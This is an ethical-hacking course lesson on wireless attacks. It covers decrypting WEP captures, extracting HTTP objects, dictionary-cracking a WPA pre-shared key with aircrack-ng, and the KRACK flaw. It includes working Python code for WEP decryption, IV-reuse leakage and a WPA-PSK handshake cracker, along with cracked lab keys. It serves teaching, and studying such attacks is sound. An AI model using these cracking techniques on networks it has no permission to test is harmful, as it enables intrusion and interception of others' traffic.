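What airdecap-ng -w is doing with the cracked key, as an added example that is not part of the lesson or of the aircrack-ng project: WEP seeds RC4 with the 24-bit IV from the frame prepended to the 40-bit key (BE:EF:BE:EF:22 is BEEFBEEF22 in hex), XORs the keystream over the payload plus a CRC-32 integrity check value, and a decrypt "succeeds" when that ICV checks out, which is the distinction behind the "decrypted" and "corrupted" WEP packet counters above. The IV, the LLC/SNAP payloads and the second frame are constructed here; the last function shows why the tiny IV space matters, since two frames under one IV share a keystream and XORing their ciphertexts leaks the XOR of the plaintexts with no key at all.

```python
import struct
import zlib


def rc4_keystream(key: bytes, length: int) -> bytes:
    """RC4 key scheduling (KSA) followed by the PRGA; returns `length` keystream bytes."""
    s = list(range(256))
    j = 0
    for i in range(256):
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    out = bytearray()
    i = j = 0
    for _ in range(length):
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(s[(s[i] + s[j]) & 0xFF])
    return bytes(out)


def icv(plaintext: bytes) -> bytes:
    """WEP integrity check value: CRC-32 of the plaintext, little-endian, encrypted with it."""
    return struct.pack("<I", zlib.crc32(plaintext) & 0xFFFFFFFF)


def wep_encrypt(key: bytes, iv: bytes, plaintext: bytes, key_id: int = 0) -> bytes:
    """WEP frame body: IV(3) | key-id byte | RC4(IV || key) XOR (plaintext || ICV)."""
    assert len(iv) == 3 and len(key) in (5, 13)      # 40-bit or 104-bit WEP key
    keystream = rc4_keystream(iv + key, len(plaintext) + 4)
    body = bytes(p ^ k for p, k in zip(plaintext + icv(plaintext), keystream))
    return iv + bytes([key_id << 6]) + body


def wep_decrypt(key: bytes, frame_body: bytes):
    """Decrypt a WEP frame body with a candidate key; returns (plaintext, icv_ok).
    icv_ok is the check that decides whether a packet counts as decrypted or corrupted."""
    iv, body = frame_body[:3], frame_body[4:]
    keystream = rc4_keystream(iv + key, len(body))
    dec = bytes(c ^ k for c, k in zip(body, keystream))
    plaintext, tag = dec[:-4], dec[-4:]
    return plaintext, icv(plaintext) == tag


def xor_leak_from_iv_reuse(frame_a: bytes, frame_b: bytes) -> bytes:
    """Two frames encrypted under the same IV share a keystream, so XORing their
    ciphertexts cancels it and yields plaintext_a XOR plaintext_b, no key needed."""
    assert frame_a[:3] == frame_b[:3], "frames must share an IV"
    return bytes(a ^ b for a, b in zip(frame_a[4:], frame_b[4:]))


# Constructed sample data: the cracked 40-bit key from the lesson plus a made-up IV and
# two made-up LLC/SNAP-framed payloads (none of this is taken from the capture files).
KEY = bytes.fromhex("BEEFBEEF22")
IV = bytes.fromhex("0A1B2C")
LLC_SNAP_IP = bytes.fromhex("AAAA030000000800")
PLAINTEXT_A = LLC_SNAP_IP + b"GET /index.html HTTP/1.1\r\n"
PLAINTEXT_B = LLC_SNAP_IP + b"HTTP/1.1 200 OK\r\nServer:a\r\n"

FRAME_A = wep_encrypt(KEY, IV, PLAINTEXT_A)
FRAME_B = wep_encrypt(KEY, IV, PLAINTEXT_B)   # same IV: with 2^24 IVs this happens on any busy WEP network


if __name__ == "__main__":
    text, ok = wep_decrypt(KEY, FRAME_A)
    print("right key  -> ICV ok:", ok, text[8:])
    text, ok = wep_decrypt(bytes.fromhex("0000000000"), FRAME_A)
    print("wrong key  -> ICV ok:", ok)
    n = min(len(PLAINTEXT_A), len(PLAINTEXT_B))
    leak = xor_leak_from_iv_reuse(FRAME_A, FRAME_B)[:n]
    print("IV reuse leak equals P_A xor P_B:",
          leak == bytes(a ^ b for a, b in zip(PLAINTEXT_A, PLAINTEXT_B)))
```

The ICV is only a CRC, not a MAC, so it tells you whether a key is right but does nothing to stop an attacker flipping bits in a frame; that linearity, together with IV reuse and the weak-IV key-recovery statistics aircrack-ng exploits, is why a few tens of thousands of captured IVs are enough to recover the key.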



Getting files from packet captures

wireshark airportSniffENFGOR-dec.cap

We now see ordinary traffic in the decrypted capture

File > Export Objects > HTTP

Getting files from packet captures

A list of HTTP objects is shown. Click the Save All button.
Click the "Create Folder" icon at the upper right.
Name the new directory and click the Create button.
Click the Open button to save the HTTP objects in the new lesson13a directory.
Click OK to acknowledge that some files could not be saved.
Click Close to finish.

Activity

As root, on your EH-Kali-XX VM:

1) scp [email protected]:../depot/lesson13/* .

2) airdecap-ng -w BEEFBEEF22 airportSniffENFGOR.cap

3) Run Wireshark on the decrypted airportSniffENFGOR-dec.cap file.

4) File > Export Objects > HTTP

5) Create a new lesson13a directory.

6) Save all the objects in the new directory.

When finished note it in the chat window.
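The Export Objects step done in code, as an added example that is not part of the lesson or of Wireshark: a minimal reader for the classic pcap format, a TCP reassembler keyed by sequence number, and an HTTP/1.x response extractor that names each object after the request path on the reverse flow, which is roughly what Wireshark does. By default airdecap-ng strips the 802.11 header and writes Ethernet frames (its -l option keeps the 802.11 header), so Ethernet is what the reader expects. The capture is constructed inline with made-up addresses; it includes a JPEG response split across two out-of-order segments, and a TLS record on port 443 to show the caveat that matters here: only cleartext HTTP can be exported, so anything fetched over https:// stays opaque even after the WEP layer is removed.

```python
import struct
from collections import defaultdict

LINKTYPE_ETHERNET = 1


def read_pcap(data: bytes):
    """Yield the frames of a classic (non-pcapng) pcap file, handling either byte order."""
    magic, = struct.unpack("<I", data[:4])
    end = "<" if magic == 0xA1B2C3D4 else ">"
    linktype, = struct.unpack(end + "I", data[20:24])
    if linktype != LINKTYPE_ETHERNET:
        raise ValueError("expected Ethernet frames: run the capture through airdecap-ng first")
    off = 24
    while off + 16 <= len(data):
        _, _, incl_len, _ = struct.unpack(end + "IIII", data[off:off + 16])
        yield data[off + 16:off + 16 + incl_len]
        off += 16 + incl_len


def tcp_segment(frame: bytes):
    """Return ((src, sport, dst, dport), seq, payload) for an IPv4/TCP frame, else None."""
    if frame[12:14] != b"\x08\x00":
        return None
    ip = frame[14:]
    ihl = (ip[0] & 0x0F) * 4
    if ip[9] != 6:                                   # not TCP
        return None
    total_len = struct.unpack("!H", ip[2:4])[0]
    tcp = ip[ihl:total_len]
    sport, dport, seq = struct.unpack("!HHI", tcp[:8])
    data_off = (tcp[12] >> 4) * 4
    return (ip[12:16], sport, ip[16:20], dport), seq, tcp[data_off:]


def extract_http_objects(pcap: bytes):
    """Reassemble each TCP flow by sequence number and pull out HTTP/1.x response bodies."""
    segments = defaultdict(dict)
    for frame in read_pcap(pcap):
        hit = tcp_segment(frame)
        if hit and hit[2]:
            flow, seq, payload = hit
            segments[flow][seq] = payload
    streams = {f: b"".join(p for _, p in sorted(s.items())) for f, s in segments.items()}
    objects = []
    for flow, stream in streams.items():
        if not stream.startswith(b"HTTP/1."):
            continue                                 # TLS streams never match: nothing to export
        head, _, body = stream.partition(b"\r\n\r\n")
        headers = {k.lower(): v for k, v in
                   (line.split(b": ", 1) for line in head.split(b"\r\n")[1:] if b": " in line)}
        length = int(headers.get(b"content-length", str(len(body)).encode()))
        request = streams.get((flow[2], flow[3], flow[0], flow[1]), b"")
        path = request.split(b" ")[1].decode() if request.startswith(b"GET ") else "/object"
        name = path.rsplit("/", 1)[-1] or "index.html"
        objects.append((name, headers.get(b"content-type", b"").decode(), body[:length]))
    return objects


def _frame(src, sport, dst, dport, seq, payload):
    """Constructed Ethernet/IPv4/TCP frame; IP and TCP checksums are left zero (not validated here)."""
    eth = bytes.fromhex("0006254b21b4") + bytes.fromhex("aabbccddeeff") + b"\x08\x00"
    tcp = struct.pack("!HHIIBBHHH", sport, dport, seq, 0, 5 << 4, 0x18, 65535, 0, 0) + payload
    ip = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 20 + len(tcp), 1, 0x4000, 64, 6, 0, src, dst) + tcp
    return eth + ip


def sample_capture() -> bytes:
    """Constructed pcap: a GET for a JPEG whose response arrives as two out-of-order segments,
    plus a TLS application-data segment on port 443 that cannot be exported."""
    client, server = bytes([10, 0, 0, 5]), bytes([93, 184, 216, 34])     # made-up addresses
    jpeg = b"\xff\xd8\xff\xe0" + b"\x00" * 12 + b"\xff\xd9"
    response = (b"HTTP/1.1 200 OK\r\nContent-Type: image/jpeg\r\n"
                + b"Content-Length: %d\r\n\r\n" % len(jpeg) + jpeg)
    cut = 30
    frames = [
        _frame(client, 51234, server, 80, 1, b"GET /news/_92592606.jpg HTTP/1.1\r\nHost: www.bbc.com\r\n\r\n"),
        _frame(server, 80, client, 51234, 1 + cut, response[cut:]),        # second half arrives first
        _frame(server, 80, client, 51234, 1, response[:cut]),
        _frame(client, 51235, server, 443, 1, b"\x17\x03\x03\x00\x10" + b"\x5a" * 16),
    ]
    header = struct.pack("<IHHiIII", 0xA1B2C3D4, 2, 4, 0, 0, 65535, LINKTYPE_ETHERNET)
    return header + b"".join(struct.pack("<IIII", 0, i, len(f), len(f)) + f for i, f in enumerate(frames))


if __name__ == "__main__":
    for name, ctype, body in extract_http_objects(sample_capture()):
        print(name, ctype, len(body), "bytes")
```

On a real -dec.cap the same reassembly is where most of the effort goes: chunked transfer encoding, gzip content encoding and retransmissions all have to be handled before the body is usable, which is the work Wireshark's exporter does for you and the reason some objects in the dialog "could not be saved".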



Getting files from packet captures

From the Kali desktop select Places > Home, open the new directory where the objects were saved, and view the objects found in the decrypted packet capture.

Getting files from packet captures

/root/lesson13a/_92592606_354d2441-d7ac-4a91-8df6-1447a909bd00(1).jpg
Find and open a .jpg file used on the BBC website

file:///root/lesson13a/blogs-trending-38002276
Find and open a .html file from the BBC website

/root/lesson13a/bump-3.js
Find and open a JavaScript file from the BBC website

Filtering for PDF documents

But the PDF from my website was not found!

Activity

As root, on your EH-Kali-XX VM:

1) Explore the new lesson13a directory.

2) Find a jpg file.

3) Find a html file.

4) Find a javascript file.

Put the names of any interesting files you find in the chat window


Activity

https://simms-teach.com/docs/cis76/cis76lab01.pdf

Why are there no PDF frames in the capture?

Write your answer in the chat window.


Capture yG7m8J

More Practice

airportSniffyG7m8J.cap

http://www.skyhighway.com/~marysimms/exercise8.html

http://www.skyhighway.com/~elizsimms/cis83/docs/portfolio-lab-VLAN.pdf

ls -l airportSniffyG7m8J.cap
root@eh-kali-05:~# ls -l airportSniffyG7m8J.cap
-rw-r--r-- 1 root root 3095355 Nov 21 12:31 airportSniffyG7m8J.cap
root@eh-kali-05:~#

file airportSniffyG7m8J.cap
root@eh-kali-05:~# file airportSniffyG7m8J.cap
airportSniffyG7m8J.cap: tcpdump capture file (little-endian) - version 2.4 (802.11 with
radiotap header, capture length 2147483647)
root@eh-kali-05:~#

This file contains encrypted packets captured on a wireless network using a Mac and transferred to the EH-Kali VM

Beacon frame in encrypted packet capture file

airdecap-ng -w BEEFBEEF22 airportSniffyG7m8J.cap


root@eh-kali-05:~# airdecap-ng -w BEEFBEEF22 airportSniffyG7m8J.cap
Total number of packets read 8203
Total number of WEP data packets 2375
Total number of WPA data packets 181
Number of plaintext data packets 0
Number of decrypted WEP packets 2255
Number of corrupted WEP packets 0
Number of decrypted WPA packets 0
root@eh-kali-05:~#

Decrypting the packet capture file using the cracked password

ls -l airportSniffy*
root@eh-kali-05:~# ls -l airportSniffy*
-rw-r--r-- 1 root root 3095355 Nov 21 12:31 airportSniffyG7m8J.cap       (encrypted)
-rw-r--r-- 1 root root 1354295 Nov 21 13:12 airportSniffyG7m8J-dec.cap   (decrypted)
root@eh-kali-05:~#

Comparing the encrypted and decrypted versions of the file

Decrypted packet capture showing normal traffic

Extracting objects from the capture: make a new directory and save all to the new directory

Activity

As root, on your EH-Kali-XX VM:

1) scp [email protected]:../depot/lesson13/* .

2) airdecap-ng -w BEEFBEEF22 airportSniffyG7m8J.cap

3) Run Wireshark on the decrypted airportSniffyG7m8J-dec.cap file.

4) Exfiltrate all HTTP objects from the capture file and place them in a
directory named lesson13b in your home directory.

When finished note it in the chat window.


Places > Home, then open the new folder

Activity

As root, on your EH-Kali-XX VM:

1) Explore the exfiltrated objects in the lesson13b directory.

2) Locate the portfolio-lab-VLAN.pdf file and look at the network diagram on the first page.

3) What is the IP address on the Cisco router for VLAN 20?

Write your answer in the chat window.


Activity

As root, on your EH-Kali-XX VM:

1) Explore the exfiltrated objects in the lesson13b directory.

2) Find the extracted coup-600x742.jpg file

3) Of the two options, what do you think Benji decided to do?

Write your answer in the chat window.


Wireless WPA/WPA2 Hacking

Wi-Fi Protected Access (WPA)

WPA
• Developed in 2003 to replace WEP.
• Still uses WEP's insecure RC4 stream cipher
• Uses Temporal Key Integrity Protocol (TKIP) to
provide extra security.
• More secure than WEP.

WPA2
• Developed in 2004 to replace WEP and WPA.
• Uses AES instead of RC4.
• Replaces TKIP with Counter Mode Cipher
Block Chaining Message Authentication Code
Protocol (CCMP).
• More secure than WPA.

As of March 2006, all devices using the Wi-Fi trademark must be WPA2 certified
http://www.diffen.com/difference/WPA_vs_WPA2

WPA and WPA2


Marcus Burton

https://www.youtube.com/watch?v=hLQ5rYNUwNg

6:46 - 7:15: Notes a PSK (pre-shared key) is vulnerable to dictionary attacks

The 4-Way Handshake


Marcus Burton

A "nonce" is
introduced in
this video
(1:50 - 2:05)

https://www.youtube.com/watch?v=9M8kVYFhMDw

This video discusses the WPA 4-way authentication handshake. Note we will use
aircrack-ng later to crack a PSK (pre-shared key) making use of this handshake.

How to Hack WPA/WPA2 Wi-Fi


With Kali Linux Aircrack-ng

Ink That! Offensive Security

This video does a full walkthrough of cracking a WPA2 password

https://www.youtube.com/watch?v=ngxzSlsP1JU

WPA/WPA2 Cracking with a Linksys WAP54G Access Point

BSSID = Basic Service Set Identifier = AP MAC address = 00:06:25:4b:21:b4
SSID = Service Set Identifier = name of the network = linkysys
STA = Station = MacBook Pro (attacker)
STA = Station = Win 10 PC (victim)

Linksys WAP54G

For this example we will use WPA (WiFi Protected Access), in Mixed Mode (B and G), SSID=linkysys, Channel 5, with a WPA shared key selected on the access point.

Sniffing using MacBook Pro


airport -s
Richards-MBP:~ rsimms$ airport -s
SSID                          BSSID             RSSI CHANNEL HT CC SECURITY (auth/unicast/group)
xfinitywifi                   22:86:8c:6c:82:4a -85  6       Y  US NONE
xfinitywifi                   96:0d:cb:ff:f4:d0 -89  11      Y  US NONE
2WIRE341                      00:22:a4:dd:8c:c9 -85  9       N  US WEP
HOME-F4D2                     90:0d:cb:ff:f4:d0 -89  11      Y  US WPA(PSK/TKIP,AES/TKIP) WPA2(PSK/TKIP,AES/TKIP)
xfinitywifi                   74:85:2a:80:f5:e1 -91  157     Y  US NONE
HOME-5                        74:85:2a:80:f5:e0 -91  157     Y  US WPA(PSK/AES,TKIP/TKIP) WPA2(PSK/AES,TKIP/TKIP)
BenjiNet_5G                   2c:56:dc:85:3e:ec -57  157     Y  -- WPA2(PSK/AES/AES)
DIRECT-F0-HP ENVY 7640 series a0:8c:fd:72:68:f1 -77  6       Y  -- WPA2(PSK/AES/AES)
linkysys                      00:06:25:4b:21:b4 -46  5       N  -- WPA(PSK/AES/AES)
HOME-2.4                      74:85:2a:80:f5:d8 -86  1       Y  US WPA(PSK/AES,TKIP/TKIP) WPA2(PSK/AES,TKIP/TKIP)
ATT288                        3c:36:e4:22:95:80 -70  1       Y  -- WPA(PSK/AES,TKIP/TKIP) WPA2(PSK/AES,TKIP/TKIP)
uLab-WiFiNet                  4c:5e:0c:ca:25:c0 -37  1,+1    Y  -- WPA2(PSK/AES/AES)
HP-Print-7B-Officejet 6600    6c:3b:e5:00:53:7b -87  9       N  -- WPA2(PSK/AES/AES)
Guest                         d8:50:e6:59:0b:fa -86  8       Y  -- WPA2(PSK/AES/AES)
Shauna                        d8:50:e6:59:0b:f9 -87  8       Y  -- WPA2(PSK/AES/AES)
MODWARE                       d8:50:e6:59:0b:f8 -86  8       Y  -- WPA2(PSK/AES/AES)
BenjiNet                      2c:56:dc:85:3e:e8 -44  8       Y  -- WPA2(PSK/AES/AES)
Richards-MBP:~ rsimms$

On a Mac, the built-in airport command with the -s option scans all available WiFi networks
(the binary lives under /System/Library/PrivateFrameworks/Apple80211.framework/Versions/Current/Resources/
and is normally symlinked into the PATH). The linkysys network on channel 5 is using WPA.

Activity

Look at the airport -s output on the previous slide

1) Is the Guest SSID network security NONE, WEP, WPA or WPA2?

2) Do you see any wireless networks that are open with no encryption?

Write your answer in the chat window.


Sniffing using MacBook Pro


[on MacBook Pro] airport en0 sniff 5
Richards-MBP:~ rsimms$ airport en0 sniff 5
Capturing 802.11 frames on en0.
^CSession saved to /tmp/airportSniff1QXjSX.cap.
Richards-MBP:~ rsimms$

Let's start sniffing the channel used by the access point for the SSID linkysys. Use
control-C to stop the capture.

[on MacBook Pro] ls -lth /private/tmp/airportSniff*.cap


Richards-MBP:~ rsimms$ ls -lth /private/tmp/airportSniff*.cap
-rw-r--r-- 1 rsimms wheel 7.3M Nov 21 18:45 /private/tmp/airportSniff1QXjSX.cap
-rw-r--r-- 1 rsimms wheel 3.0M Nov 21 11:40 /private/tmp/airportSniffyG7m8J.cap
-rw-r--r-- 1 rsimms wheel 6.4M Nov 21 10:14 /private/tmp/airportSniffENFGOR.cap
-rw-r--r-- 1 rsimms wheel 39M Nov 21 08:41 /private/tmp/airportSniffdZH641.cap
-rw-r--r-- 1 rsimms wheel 69M Nov 21 08:26 /private/tmp/airportSniff8FkDVL.cap
-rw-r--r-- 1 rsimms wheel 108M Nov 20 20:36 /private/tmp/airportSniffk44M58.cap
-rw-r--r-- 1 rsimms wheel 23M Nov 20 19:39 /private/tmp/airportSniffKzpvq8.cap
-rw-r--r-- 1 rsimms wheel 4.4M Nov 20 19:16 /private/tmp/airportSniffFVOuaV.cap
-rw-r--r-- 1 rsimms wheel 497K Nov 20 16:22 /private/tmp/airportSniffh69ghh.cap
-rw-r--r-- 1 rsimms wheel 990K Nov 20 16:14 /private/tmp/airportSniffdLJDh2.cap
-rw-r--r-- 1 rsimms wheel 2.4M Nov 20 16:05 /private/tmp/airportSniffIhmspR.cap
-rw-r--r-- 1 rsimms wheel 1.5M Nov 20 14:28 /private/tmp/airportSniffA8hduu.cap
Richards-MBP:~ rsimms$
The packets are captured and dumped into a new file in the /private/tmp directory

Capture 1QXjSX

airportSniff1QXjSX.cap

http://hayrocket.com/cabrillo/dm160b/

http://hayrocket.com/cabrillo/dm160b/final/


scp -p [email protected]:../depot/lesson13/* .
root@eh-kali-05:~# scp -p [email protected]:../depot/lesson13/* .
[email protected]'s password:
airportSniff1QXjSX.cap 100% 7510KB 7.3MB/s 00:00
airportSniffdZH641.cap 100% 39MB 38.5MB/s 00:01
airportSniffENFGOR.cap 100% 6548KB 6.4MB/s 00:00
airportSniffyG7m8J.cap 100% 3023KB 3.0MB/s 00:00
root@eh-kali-05:~#

Obtain the packet capture files

scp [email protected]:../depot/randomwords .
root@eh-kali-05:~# scp [email protected]:../depot/randomwords .
[email protected]'s password:
randomwords 100% 4838KB 4.7MB/s 00:00
root@eh-kali-05:~#

Obtain the word list of potential passwords


ls -lah air*
root@eh-kali-05:~# ls -lah air*
-rw-r--r-- 1 root root 7.4M Nov 21 18:45 airportSniff1QXjSX.cap
-rw-r--r-- 1 root root 39M Nov 21 10:21 airportSniffdZH641.cap
-rw-r--r-- 1 root root 6.4M Nov 21 10:14 airportSniffENFGOR.cap
-rw-r--r-- 1 root root 4.5M Nov 21 11:10 airportSniffENFGOR-dec.cap
-rw-r--r-- 1 root root 3.0M Nov 21 11:40 airportSniffyG7m8J.cap
-rw-r--r-- 1 root root 1.3M Nov 21 13:12 airportSniffyG7m8J-dec.cap
root@eh-kali-05:~#

This is a capture of wireless traffic on channel 5 that includes WPA encrypted linkysys traffic
Wireshark View of Captured Channel 5 802.11 Packets

wireshark airportSniff1QXjSX.cap

A linkysys network beacon frame from our access point, showing the BSSID and SSID

aircrack-ng airportSniff1QXjSX.cap
root@eh-kali-05:~# aircrack-ng airportSniff1QXjSX.cap
Opening airportSniff1QXjSX.cap
Read 29202 packets.

   #  BSSID              ESSID                  Encryption

   1  44:A2:78:BA:59:02                         Unknown
   2  D8:50:E6:59:0B:F8  MODWARE                No data - WEP or WPA
   3  D8:50:E6:59:0B:FA  Guest                  WPA (0 handshake)
   4  2C:56:DC:85:3E:E8  BenjiNet               WPA (0 handshake)
   5  00:22:A4:DD:8C:C9  2WIRE341               No data - WEP or WPA
   6  D8:50:E6:59:0B:F9  Shauna                 No data - WEP or WPA
   7  82:35:A4:DD:8C:C9                         WEP (1 IVs)
   8  8B:F3:16:85:58:A9                         WEP (1 IVs)
   9  15:D4:65:A0:E0:7E                         WEP (1 IVs)
  10  00:06:25:4B:21:B4  linkysys               WPA (1 handshake)
  11  BC:CA:B5:F1:33:60  PandaRouter            No data - WEP or WPA
  12  66:6A:AA:B7:5D:21                         Unknown
  13  4C:5E:0C:CA:25:C0  uLab-WiFiNet           WPA (0 handshake)
  14  F6:37:6A:50:91:D8                         WPA (0 handshake)
  15  AE:18:C3:90:50:D2                         WPA (0 handshake)
  16  67:33:E4:FC:9B:1C                         Unknown
  17  BE:CA:B5:F1:33:60  (non-printable SSID)   No data - WEP or WPA
  18  22:86:8C:6C:82:4A  xfinitywifi            None (0.0.0.0)
  19  27:78:F7:DE:2F:CC                         WPA (0 handshake)
  20  10:86:8C:6C:82:4A  Weiser                 No data - WEP or WPA
(output snipped; use Ctrl-C when it hangs)

Capturing a handshake is necessary to crack the pre-shared key (password).

The BSSID for linkysys is 00:06:25:4B:21:B4 and we have one authentication handshake

aircrack-ng airportSniff1QXjSX.cap -w randomwords -b 00:06:25:4B:21:B4

The arguments are the captured channel 5 WiFi packets, the list of potential passwords (-w) and the BSSID of the linkysys network (-b).

Opening airportSniff1QXjSX.cap
Reading packets, please wait...

"WPA/WPA2 supports many types of authentication beyond pre-shared keys. aircrack-ng can ONLY crack pre-shared keys."
https://www.aircrack-ng.org/doku.php?id=cracking_wpa

Activity

As root, on your EH-Kali-XX VM:


scp [email protected]:../depot/lesson13/* .
scp [email protected]:../depot/randomwords .

aircrack-ng airportSniff1QXjSX.cap -w randomwords -b 00:06:25:4B:21:B4

What is the WPA shared key? Write your answer in the chat window

root@eh-kali-05:~# time aircrack-ng airportSniff1QXjSX.cap -w randomwords -b 00:06:25:4B:21:B4
Opening airportSniff1QXjSX.cap
Reading packets, please wait...

Aircrack-ng 1.2 rc4

[00:08:36] 338052/338328 keys tested (658.54 k/s)

Time left: 0 seconds 99.92%

KEY FOUND! [ Hornblower ]

Master Key : 95 5B CA 0F 59 BE 99 2E 64 F7 88 71 6A 66 71 57
CA B8 8D CC 54 1A 4E 09 6C 1A AC E3 F3 4B 22 C6

Transient Key : B4 E3 8A 3B DF E9 60 A9 49 04 B8 FF D7 1F 4F 75
85 2D C3 E2 8B 51 EE E7 C1 CA 36 17 21 D8 22 9F
24 6D C4 90 DF 13 F0 30 F3 BE C1 CF BF 15 C8 82
26 EA 2D F2 23 5D 01 11 42 C5 3B 4F EF 03 46 40

EAPOL HMAC : 94 AC F7 08 0D 7F 1F 02 BA 65 7C 9A 7A EE F3 B1

real 8m36.989s
user 8m30.784s
sys 0m2.488s
root@eh-kali-05:~#

Using time to see how long it takes
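What aircrack-ng is computing 658 times a second in the run above, as an added example that is not part of the lesson or of the aircrack-ng project: for each candidate word it derives the PMK with PBKDF2-HMAC-SHA1 over the SSID (the "Master Key" line), expands that into the PTK with the two MAC addresses and the two nonces taken from the captured handshake (the "Transient Key" line), and recomputes the MIC of an EAPOL-Key message with the first 16 bytes of the PTK (the "EAPOL HMAC" line); a match means the word is the PSK. The SSID and the AP BSSID are the lesson's; the station MAC, the nonces and the word list are constructed, and the supplicant side is simulated so the "capture" is built inline. The PMK function is the standard derivation, so for Hornblower and linkysys it should reproduce the Master Key bytes printed above.

```python
import hashlib
import hmac
import struct


def pmk_from_passphrase(passphrase: str, ssid: str) -> bytes:
    """WPA/WPA2-PSK: PMK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 iterations, 256 bits).
    The SSID is the salt, which is why airdecap-ng needs -e as well as -p."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def ptk_from_pmk(pmk, aa, spa, anonce, snonce) -> bytes:
    """802.11i PRF-512 over the MACs and nonces exchanged in messages 1 and 2 of the 4-way handshake."""
    data = min(aa, spa) + max(aa, spa) + min(anonce, snonce) + max(anonce, snonce)
    blocks = [hmac.new(pmk, b"Pairwise key expansion\x00" + data + bytes([i]), hashlib.sha1).digest()
              for i in range(4)]
    return b"".join(blocks)[:64]            # KCK = [0:16], KEK = [16:32], TK = [32:48]


def eapol_key_mic(kck: bytes, eapol: bytes, version: int = 2) -> bytes:
    """MIC over the whole EAPOL-Key frame with its MIC field (bytes 81..97) zeroed.
    Key-descriptor version 1 uses HMAC-MD5 (TKIP), version 2 uses HMAC-SHA1 (CCMP)."""
    zeroed = eapol[:81] + b"\x00" * 16 + eapol[97:]
    digest = hashlib.md5 if version == 1 else hashlib.sha1
    return hmac.new(kck, zeroed, digest).digest()[:16]


def eapol_key_msg2(snonce: bytes, mic: bytes = b"\x00" * 16) -> bytes:
    """Minimal EAPOL-Key message 2 (station -> AP): key info 0x010A = version 2, pairwise, MIC present."""
    body = (b"\x02" + struct.pack("!HHQ", 0x010A, 16, 1) + snonce
            + b"\x00" * 16 + b"\x00" * 8 + b"\x00" * 8 + mic + struct.pack("!H", 0))
    return b"\x01\x03" + struct.pack("!H", len(body)) + body


def crack_psk(ssid, aa, spa, anonce, msg2, wordlist, version=2):
    """What aircrack-ng -w does: PMK -> PTK -> KCK per candidate, then compare the captured MIC."""
    snonce, target = msg2[17:49], msg2[81:97]
    for word in wordlist:
        kck = ptk_from_pmk(pmk_from_passphrase(word, ssid), aa, spa, anonce, snonce)[:16]
        if hmac.compare_digest(eapol_key_mic(kck, msg2, version), target):
            return word
    return None


# Constructed scenario: the lesson's SSID and AP BSSID, a made-up station MAC, fixed nonces.
SSID = "linkysys"
AA = bytes.fromhex("0006254b21b4")               # access point (authenticator) MAC
SPA = bytes.fromhex("a4b1c2d3e4f5")              # station (supplicant) MAC, constructed
ANONCE = hashlib.sha256(b"anonce").digest()       # 32-byte nonces, fixed for reproducibility
SNONCE = hashlib.sha256(b"snonce").digest()
WORDLIST = ["password", "linksys", "Hornblower", "admin"]   # stand-in for the randomwords file


def supplicant_msg2(passphrase: str) -> bytes:
    """Build message 2 the way a station that knows the passphrase would, MIC included."""
    kck = ptk_from_pmk(pmk_from_passphrase(passphrase, SSID), AA, SPA, ANONCE, SNONCE)[:16]
    unsigned = eapol_key_msg2(SNONCE)
    return eapol_key_msg2(SNONCE, eapol_key_mic(kck, unsigned))


if __name__ == "__main__":
    captured = supplicant_msg2("Hornblower")
    print("Master Key :", pmk_from_passphrase("Hornblower", SSID).hex())
    print("KEY FOUND! [", crack_psk(SSID, AA, SPA, ANONCE, captured, WORDLIST), "]")
```

Each candidate costs 4096 PBKDF2 rounds (8192 SHA-1 operations), which is why the rate is in the hundreds of keys per second on a CPU and the 338,328-word list took eight and a half minutes; the same derivation on a GPU is orders of magnitude faster, so the only real defence is a passphrase that is not in any list.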

Wireshark View of Captured Channel 5 802.11 Packets

A linkysys network beacon frame from our access point

airdecap-ng -p Hornblower -e linkysys airportSniff1QXjSX.cap

root@eh-kali-05:~# airdecap-ng -p Hornblower -e linkysys airportSniff1QXjSX.cap


Total number of packets read 29202
Total number of WEP data packets 157
Total number of WPA data packets 7447
Number of plaintext data packets 0
Number of decrypted WEP packets 0
Number of corrupted WEP packets 0
Number of decrypted WPA packets 2301
root@eh-kali-05:~#

root@eh-kali-05:~# ls -lth air*


-rw-r--r-- 1 root root 861K Nov 21 22:52 airportSniff1QXjSX-dec.cap
-rw-r--r-- 1 root root 7.4M Nov 21 18:45 airportSniff1QXjSX.cap
-rw-r--r-- 1 root root 1.3M Nov 21 13:12 airportSniffyG7m8J-dec.cap
-rw-r--r-- 1 root root 3.0M Nov 21 11:40 airportSniffyG7m8J.cap
-rw-r--r-- 1 root root 4.5M Nov 21 11:10 airportSniffENFGOR-dec.cap
-rw-r--r-- 1 root root 39M Nov 21 10:21 airportSniffdZH641.cap
-rw-r--r-- 1 root root 6.4M Nov 21 10:14 airportSniffENFGOR.cap
root@eh-kali-05:~#

Decrypt the packet capture file



Wireshark View of Decrypted Captured Packets

wireshark airportSniff1QXjSX-dec.cap

Viewing the decrypted packets using Wireshark

Activity

As root, on your EH-Kali-XX VM:

1) scp [email protected]:../depot/lesson13/* .

2) airdecap-ng -p Hornblower -e linkysys airportSniff1QXjSX.cap

3) Run Wireshark on the decrypted airportSniff1QXjSX-dec.cap file.

4) File > Export Objects > HTTP

5) Create a new lesson13c directory.

6) Save all the objects in the new directory.

When finished note it in the chat window.



Activity

As root, on your EH-Kali-XX VM:

1) Find the extracted config-switch2.html file.

2) What is the password used on this Cisco switch?

Write your answer in the chat window.


Deauth and Rogue AP Attacks (placeholder)

https://simms-teach.com/howtos/students/WiFi-Penetration-Schell.pdf

Ryan's WiFi penetration testing presentation


KRACK

Serious flaw in WPA2 protocol lets attackers intercept passwords and much more
DAN GOODIN - 10/15/2017, 9:37 PM

https://arstechnica.com/information-technology/2017/10/severe-flaw-in-wpa2-protocol-leaves-wi-fi-traffic-open-to-eavesdropping/

KRACK attack is especially bad news for Android and Linux users.
"Researchers have disclosed a serious weakness in the WPA2 protocol that allows
attackers within range of vulnerable device or access point to intercept passwords,
e-mails, and other data presumed to be encrypted, and in some cases, to inject
ransomware or other malicious content into a website a client is visiting."

Krack Attacks (WiFi WPA2 Vulnerability)


Dr Mike Pound & Dr Steve Bagley

https://www.youtube.com/watch?v=mYtvjijATa4


Assignment

Final Project

Due in two weeks

https://simms-teach.com/docs/cis76/cis76final-project.pdf

Wrap up


Next Class
Assignment: Check the Calendar Page on the web site to
see what is due next week.

Quiz questions for next class:

• No more quizzes!


